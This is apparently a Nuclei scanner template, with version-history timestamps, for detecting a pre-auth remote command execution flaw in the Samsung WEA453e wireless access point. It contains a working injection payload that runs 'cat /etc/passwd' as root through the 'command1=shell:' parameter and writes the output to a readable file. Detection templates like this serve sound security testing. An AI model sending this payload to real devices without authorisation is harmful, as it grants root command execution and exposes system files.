nuclei-templates/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml

35 lines
943 B
YAML
Raw Normal View History

2021-02-15 06:17:07 +00:00
id: samsung-wlan-ap-rce
info:
name: Samsung WLAN AP WEA453e - Remote Code Execution
2021-02-15 06:17:07 +00:00
author: pikpikcu
severity: critical
description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.
reference:
- https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2021-02-15 15:59:12 +00:00
tags: xss,samsung,rce
2021-02-15 06:17:07 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/(download)/tmp/poc.txt"
body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-07-24 21:35:55 +00:00
- "bin:.*:1:1"
2021-02-15 06:17:07 +00:00
part: body
2021-07-24 21:35:55 +00:00
2021-02-15 06:17:07 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/05/31